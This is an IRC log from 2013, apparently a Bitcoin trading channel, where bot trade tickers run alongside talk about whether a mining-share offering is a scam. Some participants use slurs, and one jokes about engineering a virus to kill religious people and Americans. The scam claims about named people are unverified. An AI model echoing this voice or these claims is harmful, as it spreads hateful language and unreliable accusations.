8 @ 0.253 = 2.024 BTC [+] Jul 22 23:38:02 [HAVELOCK] [HIM] 11 @ 0.254 = 2.794 BTC [+] Jul 22 23:38:04 [HAVELOCK] [HIM] 1 @ 0.255 BTC [+] Jul 22 23:39:30 Ukyo: I bet your nick highlighter goes off constantly because of assetbot Jul 22 23:39:46 ;; bcstats Jul 22 23:39:49 [BTCTC] [B.YABMC] 1 @ 0.003099 BTC [+] Jul 22 23:39:49 Current Blocks: 247981 | Current Difficulty: 3.125696072776893E7 | Next Difficulty At Block: 249983 | Next Difficulty In: 2002 blocks | Next Difficulty In About: 1 week, 4 days, 7 hours, 27 minutes, and 27 seconds | Next Difficulty Estimate: 31343392.0739 | Estimated Percent Change: 0.27652 Jul 22 23:39:56 [HAVELOCK] [HIM] 7 @ 0.255 = 1.785 BTC [+] Jul 22 23:42:07 [BTCTC] [AMC-PT] 4000 @ 0.004 = 16 BTC [+] Jul 22 23:43:35 [BTCTC] [DMS.PURCHASE] 390 @ 0.039422 = 15.3746 BTC [+] Jul 22 23:44:04 t-peazy Jul 22 23:44:37 og leprechaun cum gargler Jul 22 23:45:26 sooo Jul 22 23:45:36 most every al-quaeda guy held in iraq broke out Jul 22 23:45:52 [BTCTC] [DMS.SELLING] 100 @ 0.0255 = 2.55 BTC [-] Jul 22 23:45:54 massive jailbreak operation brought to you by cia, which has decided the end of the usg. Jul 22 23:46:13 url Jul 22 23:46:18 ;;ticker Jul 22 23:46:18 MtGox BTCUSD ticker | Best bid: 91.41428, Best ask: 91.78880, Bid-ask spread: 0.37452, Last trade: 91.78880, 24 hour volume: 8294.62733822, 24 hour low: 88.80501, 24 hour high: 92.00000, 24 hour vwap: 91.33284 Jul 22 23:46:22 [BTCTC] [BTC-BOND] 1 @ 0.00992 BTC [-] Jul 22 23:46:22 wat Jul 22 23:46:31 [BTCTC] [AMC-PT] 100 @ 0.004 = 0.4 BTC [+] Jul 22 23:47:00 http://www.reuters.com/article/2013/07/22/us-iraq-violence-idUSBRE96L0RM20130722 Jul 22 23:47:04 Al Qaeda militants flee Iraq jail in violent mass break-out Jul 22 23:47:14 that really shows the sham that is us military power Jul 22 23:47:24 can't hold a damn high-security prison against a bunch of epithets Jul 22 23:47:33 [BTCTC] [BFMINES] 3 @ 0.003999 = 0.012 BTC [-] Jul 22 23:47:58 peace don't pay the bills Jul 22 23:51:07 parseval: you dont even know Jul 22 23:51:11 well, I've destroyed tis clit Jul 22 23:51:31 and evidently the keys next to it Jul 22 23:52:01 fixed the clit drift though Jul 22 23:53:20 [BTCTC] [DMS.PURCHASE] 25 @ 0.039422 = 0.9856 BTC [+] Jul 22 23:53:38 [BTCTC] [TAT.ASICMINER] 6 @ 0.045601 = 0.2736 BTC [-] Jul 22 23:53:44 you may henceforth call me Clit Destroyer Jul 22 23:54:11 [BTCTC] [AMC-PT] 75 @ 0.003776 = 0.2832 BTC [-] Jul 22 23:54:13 [BTCTC] [AMC-PT] 150 @ 0.003775 = 0.5663 BTC [-] Jul 22 23:54:15 [BTCTC] [AMC-PT] 128 @ 0.003754 = 0.4805 BTC [-] Jul 22 23:54:19 [BTCTC] [AMC-PT] 6 @ 0.003753 = 0.0225 BTC [-] Jul 22 23:54:21 [BTCTC] [AMC-PT] 141 @ 0.00375 = 0.5288 BTC [-] Jul 22 23:55:26 [BTCTC] [COGNITIVE] 1 @ 0.798999 BTC [-] Jul 22 23:55:28 [BTCTC] [COGNITIVE] 1 @ 0.8025 BTC [+] Jul 22 23:55:35 [BTCTC] [AMC-PT] 76 @ 0.004049 = 0.3077 BTC [+] Jul 22 23:57:36 [BTCTC] [CRYPTO-TRADE] 5 @ 0.199996 = 1 BTC [+] Jul 22 23:57:38 [HAVELOCK] [AM100] 20 @ 0.044 = 0.88 BTC [-] Jul 22 23:57:45 [BTCTC] [CRYPTO-TRADE] 10 @ 0.199997 = 2 BTC [+] Jul 22 23:57:57 [BTCTC] [CRYPTO-TRADE] 25 @ 0.199999 = 5 BTC [+] Jul 23 00:00:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.045621 = 0.4562 BTC [+] Jul 23 00:02:19 [BTCTC] [AMC-PT] 112 @ 0.004046 = 0.4532 BTC [-] Jul 23 00:02:39 [BTCTC] [ASICMINER-PT] 1 @ 4.68999 BTC [+] Jul 23 00:03:09 [HAVELOCK] [AM100] 200 @ 0.04425 = 8.85 BTC [+] Jul 23 00:03:12 [HAVELOCK] [AM100] 5 @ 0.044 = 0.22 BTC [-] Jul 23 00:03:14 [HAVELOCK] [AM100] 120 @ 0.0438 = 5.256 BTC [-] Jul 23 00:03:15 [HAVELOCK] [AM100] 23 @ 0.0437 = 1.0051 BTC [-] Jul 23 00:03:17 [HAVELOCK] [AM100] 100 @ 0.04360101 = 4.3601 BTC [-] Jul 23 00:03:20 [HAVELOCK] [AM100] 50 @ 0.04360099 = 2.18 BTC [-] Jul 23 00:03:22 [HAVELOCK] [AM100] 10 @ 0.0436 = 0.436 BTC [-] Jul 23 00:03:24 [HAVELOCK] [AM100] 1 @ 0.04350001 BTC [-] Jul 23 00:03:26 [HAVELOCK] [AM100] 5 @ 0.0435 = 0.2175 BTC [-] Jul 23 00:03:28 [HAVELOCK] [AM100] 1 @ 0.04331102 BTC [-] Jul 23 00:03:30 [HAVELOCK] [AM100] 100 @ 0.04331101 = 4.3311 BTC [-] Jul 23 00:03:32 [HAVELOCK] [AM100] 16 @ 0.0433 = 0.6928 BTC [-] Jul 23 00:03:34 [HAVELOCK] [AM100] 5 @ 0.0433 = 0.2165 BTC [-] Jul 23 00:03:35 [HAVELOCK] [AM100] 5 @ 0.0431 = 0.2155 BTC [-] Jul 23 00:03:37 [HAVELOCK] [AM100] 22 @ 0.043 = 0.946 BTC [-] Jul 23 00:03:39 [HAVELOCK] [AM100] 300 @ 0.042951 = 12.8853 BTC [-] Jul 23 00:03:41 [HAVELOCK] [AM100] 500 @ 0.04295 = 21.475 BTC [-] Jul 23 00:03:43 [HAVELOCK] [AM100] 5 @ 0.0429 = 0.2145 BTC [-] Jul 23 00:03:45 [HAVELOCK] [AM100] 1 @ 0.04287 BTC [-] Jul 23 00:03:48 [HAVELOCK] [AM100] 98 @ 0.04286101 = 4.2004 BTC [-] Jul 23 00:03:50 [HAVELOCK] [AM100] 100 @ 0.042861 = 4.2861 BTC [-] Jul 23 00:03:52 [HAVELOCK] [AM100] 200 @ 0.04285 = 8.57 BTC [-] Jul 23 00:03:54 [HAVELOCK] [AM100] 133 @ 0.04281101 = 5.6939 BTC [-] Jul 23 00:04:33 [BTCTC] [TAT.ASICMINER] 62 @ 0.045623 = 2.8286 BTC [+] Jul 23 00:06:11 [BTCTC] [TAT.ASICMINER] 67 @ 0.045623 = 3.0567 BTC [+] Jul 23 00:06:13 [BTCTC] [TAT.ASICMINER] 133 @ 0.045622 = 6.0677 BTC [-] Jul 23 00:08:02 [BTCTC] [B.YABMC] 11 @ 0.003099 = 0.0341 BTC [+] Jul 23 00:11:57 [HAVELOCK] [AM100] 82 @ 0.042851 = 3.5138 BTC [+] Jul 23 00:18:34 [BTCTC] [AMC-PT] 7 @ 0.004041 = 0.0283 BTC [-] Jul 23 00:20:51 [MPEX] [S.MPOE] 1591 @ 0.00080322 = 1.2779 BTC [-] Jul 23 00:20:53 [MPEX] [S.MPOE] 7359 @ 0.00079979 = 5.8857 BTC [-] Jul 23 00:23:54 What's the news I missed on AMC today? Jul 23 00:25:09 Well, they are usinig a free shopping cart to sell a $500,000 product Jul 23 00:25:19 so that seems legit and all Jul 23 00:25:27 Prestashop Jul 23 00:26:07 Barely changed at all Jul 23 00:27:27 jborkl you still think it's a scam? Jul 23 00:27:34 or are they just incompetent Jul 23 00:28:03 they start off as different things but basically end the same way Jul 23 00:28:20 I can not say, I have not done any research on it. I am observing the same behavior as prior scams Jul 23 00:28:29 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.003659 = 0.022 BTC [-] Jul 23 00:28:47 I do not like the looks of it at all Jul 23 00:28:55 i see it also Jul 23 00:28:58 [BTCTC] [ASICMINER-PT] 2 @ 4.66005 = 9.3201 BTC [-] Jul 23 00:29:05 i hate calling something a scam if it turns out legit Jul 23 00:29:15 I also do not believe the volume, it makes no sense Jul 23 00:30:02 It would interesting to see if goes to .01 Jul 23 00:30:07 if it* Jul 23 00:31:24 [BTCTC] [AMC-PT] 67 @ 0.00404 = 0.2707 BTC [-] Jul 23 00:31:26 [BTCTC] [AMC-PT] 105 @ 0.004041 = 0.4243 BTC [+] Jul 23 00:31:28 [BTCTC] [AMC-PT] 29 @ 0.004043 = 0.1172 BTC [+] Jul 23 00:31:30 [BTCTC] [AMC-PT] 1303 @ 0.004047 = 5.2732 BTC [+] Jul 23 00:31:31 [BTCTC] [AMC-PT] 100 @ 0.004048 = 0.4048 BTC [+] Jul 23 00:31:33 [BTCTC] [AMC-PT] 696 @ 0.00405 = 2.8188 BTC [+] Jul 23 00:31:48 For today, I just need it to reach .0045 and I'll be happy Jul 23 00:32:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.04562 BTC [-] Jul 23 00:32:49 [BTCTC] [TAT.ASICMINER] 58 @ 0.0456 = 2.6448 BTC [-] Jul 23 00:32:54 [HAVELOCK] [AM100] 1 @ 0.044299 BTC [+] Jul 23 00:32:58 How many shares are there anyway? Jul 23 00:32:59 [BTCTC] [TAT.ASICMINER] 47 @ 0.0456 = 2.1432 BTC [-] Jul 23 00:33:37 10M imho Jul 23 00:33:54 Is that written somewhere in a contract? Jul 23 00:34:02 [BTCTC] [DMS.SELLING] 120 @ 0.0255 = 3.06 BTC [-] Jul 23 00:34:03 it's messy Jul 23 00:34:09 "5000000" Jul 23 00:34:31 Really, I am curious is there a real number? Jul 23 00:34:39 [BTCTC] [ASICMINER-PT] 7 @ 4.699499 = 32.8965 BTC [+] Jul 23 00:34:40 That's what it says on btct Jul 23 00:34:48 as far as btct goes Jul 23 00:34:53 [BTCTC] [AMC-PT] 30 @ 0.0025 = 0.075 BTC [-] Jul 23 00:35:45 [BTCTC] [ASICMINER-PT] 19 @ 4.6995 = 89.2905 BTC [+] Jul 23 00:35:49 [BTCTC] [AMC-PT] 200 @ 0.0028 = 0.56 BTC [+] Jul 23 00:35:51 [BTCTC] [AMC-PT] 700 @ 0.00405 = 2.835 BTC [+] Jul 23 00:35:55 https://bitcointalk.org/index.php?topic=252531.msg2777982#msg2777982 here are some numbers Jul 23 00:36:01 [ActiveMining] The Official Active Mining Discussion Thread Jul 23 00:36:12 100m I guess Jul 23 00:36:14 but it's even more messy, because "activemining holds acm-shares" Jul 23 00:36:25 but i think 10M was the number in total Jul 23 00:36:28 or 100?! Jul 23 00:36:33 i'm sorry, not sure :) Jul 23 00:36:41 so 100 million ? Jul 23 00:36:49 [BTCTC] [AMC-PT] 34 @ 0.00405 = 0.1377 BTC [+] Jul 23 00:36:51 or 25 million Jul 23 00:37:14 It says 100m on the forums lol, saying a total of 7.9mil have been issued Jul 23 00:37:16 so Jul 23 00:37:42 well, 100 million is the number that matters - not the issued Jul 23 00:37:47 yeah Jul 23 00:37:52 https://bitcointalk.org/index.php?topic=254930.0 Jul 23 00:38:08 ActiveMining Overview and Speculation Thread Jul 23 00:39:00 hmm, that is confusing as shit Jul 23 00:39:01 take a look at "Merger/Emergence of Active Mining Umbrella" Jul 23 00:39:08 so we will go with 100 million Jul 23 00:39:39 [BTCTC] [BITVPS] 50 @ 0.002046 = 0.1023 BTC [+] Jul 23 00:39:57 so I think the market cap is "400,000" bitcoins Jul 23 00:40:12 [BTCTC] [BITVPS] 299 @ 0.00205 = 0.613 BTC [+] Jul 23 00:40:19 or 40 million usd more or less Jul 23 00:40:31 yep Jul 23 00:40:40 they are the next asicminer bro Jul 23 00:40:55 [BTCTC] [BITVPS] 8 @ 0.002087 = 0.0167 BTC [+] Jul 23 00:40:57 [BTCTC] [BITVPS] 1 @ 0.00209 BTC [+] Jul 23 00:40:59 [BTCTC] [BITVPS] 1 @ 0.00209 BTC [+] Jul 23 00:40:59 [BTCTC] [BITVPS] 80 @ 0.002095 = 0.1676 BTC [+] Jul 23 00:41:00 [BTCTC] [BITVPS] 100 @ 0.002098 = 0.2098 BTC [+] Jul 23 00:41:04 xD Jul 23 00:41:44 hmm, so I have 1 th under development - so I guess that is worth 6.5 mil? Jul 23 00:41:54 [BTCTC] [BITVPS] 11 @ 0.0021 = 0.0231 BTC [+] Jul 23 00:41:56 [BTCTC] [BITVPS] 500 @ 0.002158 = 1.079 BTC [+] Jul 23 00:41:57 [BTCTC] [BITVPS] 48 @ 0.002159 = 0.1036 BTC [+] Jul 23 00:42:09 [BTCTC] [BITVPS] 240 @ 0.002159 = 0.5182 BTC [+] Jul 23 00:42:26 yep want me to IPO that for you? Jul 23 00:42:56 hmm , not a bad idea but I don't want to be a issuer Jul 23 00:43:29 [HAVELOCK] [AM100] 2 @ 0.04399999 = 0.088 BTC [-] Jul 23 00:44:12 [HAVELOCK] [AM100] 20 @ 0.04285301 = 0.8571 BTC [-] Jul 23 00:44:25 [HAVELOCK] [SDSTM] 2 @ 0.01095 = 0.0219 BTC [-] Jul 23 00:44:28 [HAVELOCK] [SMG] 100 @ 0.0002675 = 0.0268 BTC [+] Jul 23 00:44:30 [HAVELOCK] [SDSTM] 15 @ 0.0109 = 0.1635 BTC [-] Jul 23 00:44:44 [HAVELOCK] [AM100] 13 @ 0.04285288 = 0.5571 BTC [-] Jul 23 00:45:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.045911 BTC [+] Jul 23 00:45:56 it's 25m, where 15m are held by actm and 10m by the community .. according to streets Jul 23 00:47:06 but it's even more messy, because "activemining holds acm-shares" << totally usagi. Jul 23 00:48:45 so active mining is 25 million shares of 100 million shares of amc Jul 23 00:48:52 so who is vmc Jul 23 00:49:30 It's like Greek Mythology, it gets messy. Jul 23 00:50:08 [BTCTC] [BASIC-MINING] 1 @ 0.61 BTC [-] Jul 23 00:50:18 shit has usagi all over it Jul 23 00:50:25 http://www.flickr.com/photos/98907028@N08/ Jul 23 00:50:29 Flickr: babefoot's Photostream Jul 23 00:50:53 A. When this venture was first conceived AMC was essentially the entity that the shareholders represented. VMC was the producer and seller of the miners. The separate companies threw investors off. Now, to make it much more simple for investors to understand, Active Mining is the umbrella that all holders are invested in. VMC should just be seen as the sales division and AMC as Jul 23 00:50:53 the mining division. As an investor you are invested in all of Active Mining, its sales and mining revenue, hence the merger. Jul 23 00:50:55 so a photo of a psu, a case and a camera is all we need. good to go guys Jul 23 00:51:12 hey, don't forget a webshop :D Jul 23 00:51:39 I'm not 100% of the company, but still doing what I can to make money off em while I can. Jul 23 00:51:43 huh, this is cablepair all over again Jul 23 00:51:45 100% sure* Jul 23 00:51:58 I am Jul 23 00:52:24 [BTCTC] [AMC-PT] 200 @ 0.00405 = 0.81 BTC [+] Jul 23 00:52:57 You are what? Jul 23 00:53:06 100% sure Jul 23 00:53:08 https://bitcointalk.org/index.php?topic=158806.msg2640041#msg2640041 Jul 23 00:53:14 is that a joke Jul 23 00:53:15 [AMC]-The Official Active Mining Cooperative Discussion Jul 23 00:53:16 ? Jul 23 00:54:32 [HAVELOCK] [AM100] 1 @ 0.044299 BTC [+] Jul 23 00:54:33 ok I got it- Cablepair = Ken and Streets = Buzzdave Jul 23 00:55:14 streets and vbs do a great job Jul 23 00:56:46 i'm very curious how ken s. is going to convert nearly 10k btc to fiat Jul 23 00:57:07 buzzdave did a good job also Jul 23 00:57:14 looking at the past.. it will be a another chapter of actm drama Jul 23 00:57:33 [BTCTC] [AMC-PT] 240 @ 0.00405 = 0.972 BTC [+] Jul 23 00:59:03 how much btc has he taken in so far? Jul 23 00:59:30 !ticker btctc amc-pt Jul 23 00:59:38 [BTCT:AMC-PT] 1D: 0.0027 / 0.00351 / 0.004749 (393487 shares, 1379.2 BTC), 7D: 0.00231 / 0.00265 / 0.004749 (3052117 shares, 8098.5 BTC), 30D: 0.00099 / 0.00254 / 0.1 (4611229 shares, 11692.4 BTC) Jul 23 01:00:56 [BTCTC] [S.MPOE-PT] 25 @ 0.000945 = 0.0236 BTC [+] Jul 23 01:01:27 [BTCTC] [AMC-PT] 11 @ 0.00405 = 0.0446 BTC [+] Jul 23 01:01:56 [BTCTC] [S.MPOE-PT] 2 @ 0.000945 = 0.0019 BTC [+] Jul 23 01:05:39 [BTCTC] [AMC-PT] 2285 @ 0.00405 = 9.2543 BTC [+] Jul 23 01:05:41 [BTCTC] [AMC-PT] 150 @ 0.00405 = 0.6075 BTC [+] Jul 23 01:05:43 [BTCTC] [AMC-PT] 259 @ 0.004059 = 1.0513 BTC [+] Jul 23 01:05:45 [BTCTC] [AMC-PT] 250 @ 0.00406 = 1.015 BTC [+] Jul 23 01:05:47 [BTCTC] [AMC-PT] 240 @ 0.004067 = 0.9761 BTC [+] Jul 23 01:05:49 [BTCTC] [AMC-PT] 250 @ 0.00407 = 1.0175 BTC [+] Jul 23 01:05:51 [BTCTC] [AMC-PT] 100 @ 0.004075 = 0.4075 BTC [+] Jul 23 01:07:53 [BTCTC] [BASIC-MINING] 3 @ 0.600001 = 1.8 BTC [-] Jul 23 01:08:53 [BTCTC] [BASIC-MINING] 1 @ 0.6 BTC [-] Jul 23 01:08:55 [BTCTC] [BASIC-MINING] 1 @ 0.587001 BTC [-] Jul 23 01:08:57 [BTCTC] [BASIC-MINING] 1 @ 0.587 BTC [-] Jul 23 01:09:01 [BTCTC] [ASICMINER-PT] 1 @ 4.718 BTC [+] Jul 23 01:09:03 huh, this is cablepair all over again << inexplicably tyhe buzzdave shill is involved in the 100th scam rather than this one Jul 23 01:09:07 IF they're even distinct Jul 23 01:09:20 logically you'd expect there's exactly one scammer group running all of them Jul 23 01:09:32 [BTCTC] [AMC-PT] 432 @ 0.004137 = 1.7872 BTC [+] Jul 23 01:09:34 yes, with our new asian overloards Jul 23 01:09:49 [BTCTC] [RSM] 1 @ 0.01434 BTC [-] Jul 23 01:11:01 I am sure you are correct , the same people are just getting better at running the same scam time after time Jul 23 01:11:24 [BTCTC] [AMC-PT] 268 @ 0.004137 = 1.1087 BTC [+] Jul 23 01:11:26 [BTCTC] [AMC-PT] 185 @ 0.004139 = 0.7657 BTC [+] Jul 23 01:14:53 and it makes sense to make 500 versions Jul 23 01:15:21 for one it allows them to a/b test. for the other it gives a false impression of competition, which may perhaps keep competing scamteams out Jul 23 01:15:37 for a third, it helps the crowd form the mistaken impression of baseline, ie, "it's how it;'s done" Jul 23 01:16:08 basically what they need is a dozen or so people and internet access. india callcenters offer this for a hundred bux a day or less. Jul 23 01:16:25 if 1% of the sales they report are actual retarded americans they're just about even money Jul 23 01:16:57 https://bitcointalk.org/index.php?topic=260035.0 Jul 23 01:17:00 WTB Trust Ratings Jul 23 01:17:40 well written again MP Jul 23 01:18:08 that needs to go onto Trilema Jul 23 01:18:46 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003649 BTC [-] Jul 23 01:19:33 perhaps, yea. except im pretty sure the readership of trilema is keen Jul 23 01:19:38 it should probably go on reddit or w/e Jul 23 01:19:52 true Jul 23 01:19:57 not that the sort of idiots would read it, so. Jul 23 01:20:09 [BTCTC] [AMC-PT] 50 @ 0.0039 = 0.195 BTC [-] Jul 23 01:20:18 From BtcGuild: Jul 23 01:20:18 "A huge number of Block Erupters have been packed to ship out on Monday, July 22nd." Jul 23 01:20:29 oh wait nevermind Jul 23 01:20:40 those are just the usb, not the blades Jul 23 01:21:21 [BTCTC] [AMC-PT] 1 @ 0.003846 BTC [-] Jul 23 01:21:23 [BTCTC] [AMC-PT] 1 @ 0.003846 BTC [-] Jul 23 01:21:25 [BTCTC] [AMC-PT] 2 @ 0.003845 = 0.0077 BTC [-] Jul 23 01:21:26 [BTCTC] [AMC-PT] 141 @ 0.003833 = 0.5405 BTC [-] Jul 23 01:21:27 [BTCTC] [AMC-PT] 118 @ 0.003832 = 0.4522 BTC [-] Jul 23 01:21:54 [BTCTC] [AMC-PT] 37 @ 0.00383 = 0.1417 BTC [-] Jul 23 01:22:43 noob pr rule #54 : it's always better to say "huge" than 50 Jul 23 01:23:18 [18:19] it should probably go on reddit or w/e <<< they'll just say you are mean or jealous, and you'll extend you're scammer brand to another forum Jul 23 01:23:35 [BTCTC] [ASICMINER-PT] 1 @ 4.681 BTC [-] Jul 23 01:23:56 lol Jul 23 01:24:23 actually there was some kid showed up her ecoupla weeks ago Jul 23 01:24:26 Wow Gox volume is down to 9000 today, shows how much market they have lost Jul 23 01:24:32 [MPEX] [S.MPOE] 7150 @ 0.00080336 = 5.744 BTC [+] Jul 23 01:25:21 heh they are equal to bitstamp volume atm Jul 23 01:26:08 big price difference between them geez Jul 23 01:26:31 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003368 BTC [-] Jul 23 01:26:48 Jul 02 18:53:54 Ah, seems like a bit of a faggot. Well, it would seem like young people get a bad name in this community.. Jul 23 01:26:48 91.97 vs 84.59 Jul 23 01:26:51 that kid. Jul 23 01:27:12 so i gave him the job of reddit officer. he wanted to be paid but didn't know how much, so i eventually settled on 1 btc a month Jul 23 01:27:18 but he wanted it weekly, so we've done it weekly. Jul 23 01:27:26 how's he doing? Jul 23 01:27:31 the first week he made a coupla postings, wanted to see if he can get paid more. Jul 23 01:27:39 the next week he excused himself as he was on vacation Jul 23 01:27:42 but then wanted to be paid Jul 23 01:27:46 lol Jul 23 01:27:47 and haven't seen him since. Jul 23 01:27:52 now, it's not that kids have a bad name Jul 23 01:27:54 sad Jul 23 01:28:02 it's that objectively kids do not have what it takes to be useful. Jul 23 01:28:17 i take him to be representative of reddit really. Jul 23 01:28:37 not much point for the adults to interject themselves in each and every playground with their borish adult stuff. Jul 23 01:28:39 which subreddit? Jul 23 01:28:44 i've never kept track Jul 23 01:31:06 furuknap is still fighting the good fight of "the future halving changes everything now" on the forums Jul 23 01:31:27 even Deprived is getting bored with responding Jul 23 01:32:03 that problem will only grow worse Jul 23 01:32:18 for \every ounce of clue there's a few long tons of firm conviction, especially on the web Jul 23 01:32:52 most annoyingly, the common strategy seems to be "here's what i think, right or wrong, the onus is upon the world to prove to me otherwise" Jul 23 01:32:56 namworld style. Jul 23 01:33:06 rather than the much more reasonable "i'm a clueless fuckwit, anyone got a clue for me ?" Jul 23 01:33:17 hey that's my line Jul 23 01:33:26 [BTCTC] [AMC-PT] 1000 @ 0.00408 = 4.08 BTC [+] Jul 23 01:33:28 [BTCTC] [AMC-PT] 2750 @ 0.004091 = 11.2503 BTC [+] Jul 23 01:33:34 You paid matt to post on reddit? the /r/bitcoinstocks? Jul 23 01:33:38 a line that's liable to take you far. Jul 23 01:33:56 Rulother_ reddit officer, it's a job. new media, stuff like that. you know ? Jul 23 01:34:11 Ah ok gotcha Jul 23 01:34:59 [BTCTC] [AMC-PT] 200 @ 0.0041 = 0.82 BTC [+] Jul 23 01:35:01 [BTCTC] [AMC-PT] 38 @ 0.004139 = 0.1573 BTC [+] Jul 23 01:35:02 [BTCTC] [AMC-PT] 1262 @ 0.00414 = 5.2247 BTC [+] Jul 23 01:35:30 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0034 = 0.034 BTC [+] Jul 23 01:35:30 [HAVELOCK] [AM100] 5 @ 0.0439 = 0.2195 BTC [-] Jul 23 01:37:18 note: he also pays people to stick stationary in their ass Jul 23 01:37:25 stationery Jul 23 01:37:34 sorry Jul 23 01:37:38 :) Jul 23 01:37:53 [BTCTC] [AMC-PT] 31 @ 0.004139 = 0.1283 BTC [-] Jul 23 01:38:04 [BTCTC] [DMS.MINING] 1 @ 0.014995 BTC [+] Jul 23 01:38:27 and to write MP on their boobs Jul 23 01:39:09 http://bitcoinmagazine.com/introducing-bitcoin-the-movie/ Jul 23 01:39:16 Introducing Bitcoin: The Movie | Bitcoin MagazineBitcoin Magazine Jul 23 01:39:21 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003379 = 0.0068 BTC [-] Jul 23 01:39:25 [BTCTC] [ASICMINER-PT] 1 @ 4.670006 BTC [-] Jul 23 01:40:01 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:40:05 [BTCTC] [AMC-PT] 1100 @ 0.004088 = 4.4968 BTC [-] Jul 23 01:40:16 In June, a couple in Utah announced a project to live only on Bitcoin for ninety days and make a movie about their adventures, and have already raised $70,000 for their efforts. Jul 23 01:40:36 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:40:39 [HAVELOCK] [AM100] 83 @ 0.043003 = 3.5692 BTC [-] Jul 23 01:40:42 [HAVELOCK] [AM100] 83 @ 0.043003 = 3.5692 BTC [-] Jul 23 01:40:59 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:41:03 [BTCTC] [AMC-PT] 13 @ 0.004088 = 0.0531 BTC [-] Jul 23 01:41:23 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:41:47 [BTCTC] [AMC-PT] 23 @ 0.004088 = 0.094 BTC [-] Jul 23 01:41:55 [HAVELOCK] [AM100] 20 @ 0.043003 = 0.8601 BTC [-] Jul 23 01:42:00 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:42:19 [HAVELOCK] [AM100] 50 @ 0.043003 = 2.1502 BTC [-] Jul 23 01:42:24 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:42:49 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:43:20 [HAVELOCK] [AM100] 50 @ 0.043003 = 2.1502 BTC [-] Jul 23 01:43:28 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:43:32 [BTCTC] [S.MPOE-PT] 1 @ 0.000945 BTC [+] Jul 23 01:43:38 [HAVELOCK] [AM100] 50 @ 0.043003 = 2.1502 BTC [-] Jul 23 01:43:50 [HAVELOCK] [AM100] 15 @ 0.043003 = 0.645 BTC [-] Jul 23 01:44:08 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:44:29 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:44:33 http://www.hollywoodreporter.com/live-feed/12-monkeys-adaptation-series-order-590140 Jul 23 01:44:38 '12 Monkeys' Adaptation Near Series Order at Syfy (Exclusive) Jul 23 01:44:50 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:44:51 Crazy, I would probably give it a watch Jul 23 01:45:15 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:45:35 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:45:56 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:46:22 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:46:44 ;;last Jul 23 01:46:44 [18:46:10] [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:46:56 ;;tat.virtualmine Jul 23 01:46:56 Error: "tat.virtualmine" is not a valid command. Jul 23 01:47:01 [BTCTC] [AMC-PT] 16 @ 0.004137 = 0.0662 BTC [+] Jul 23 01:47:05 i fail lol Jul 23 01:47:25 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003379 = 0.0338 BTC [-] Jul 23 01:48:48 [BTCTC] [AMC-PT] 1197 @ 0.004 = 4.788 BTC [-] Jul 23 01:50:59 [HAVELOCK] [AM100] 250 @ 0.043002 = 10.7505 BTC [-] Jul 23 01:51:38 [BTCTC] [AMC-PT] 435 @ 0.004138 = 1.8 BTC [+] Jul 23 01:52:05 [BTCTC] [AMC-PT] 243 @ 0.004138 = 1.0055 BTC [+] Jul 23 01:53:43 [BTCTC] [TAT.ASICMINER] 7 @ 0.045911 = 0.3214 BTC [+] Jul 23 01:55:40 [BTCTC] [AMC-PT] 500 @ 0.004 = 2 BTC [-] Jul 23 01:55:41 Well just put in my request for a refund from BFL Jul 23 01:55:48 so we'll see how that goes. Jul 23 01:58:48 Apocalyptic dub what would you do if you had a bunch of dough ? Jul 23 02:01:27 [BTCTC] [LTC-ATF.B2] 10 @ 0.010021 = 0.1002 BTC [-] Jul 23 02:04:11 mircea_popescu: how much dough Jul 23 02:04:43 Ideally I'd create a virus with 100% mortality for religious people and americans Jul 23 02:04:53 what's the fun in that ? Jul 23 02:05:07 fixing the species Jul 23 02:05:14 http://i.imgur.com/8YvX1TR.gif Jul 23 02:05:24 dude fixing the species is like fixing the wind. Jul 23 02:05:49 [MPEX] [S.MPOE] 1291 @ 0.00079979 = 1.0325 BTC [-] Jul 23 02:05:51 [MPEX] [S.MPOE] 6559 @ 0.00079967 = 5.245 BTC [-] Jul 23 02:06:10 well my next option is plain old hookers and blow Jul 23 02:06:40 for everyone Jul 23 02:06:44 [HAVELOCK] [SDSTM] 1 @ 0.011 BTC [+] Jul 23 02:10:00 [BTCTC] [DMS.SELLING] 3 @ 0.025687 = 0.0771 BTC [+] Jul 23 02:10:33 [BTCTC] [AMC-PT] 1 @ 0.004099 BTC [+] Jul 23 02:12:04 [BTCTC] [AMC-PT] 85 @ 0.004051 = 0.3443 BTC [-] Jul 23 02:12:27 i don't believe in egalitarism. Jul 23 02:14:36 only an idiot would Jul 23 02:15:41 obviously I get the best blow Jul 23 02:15:55 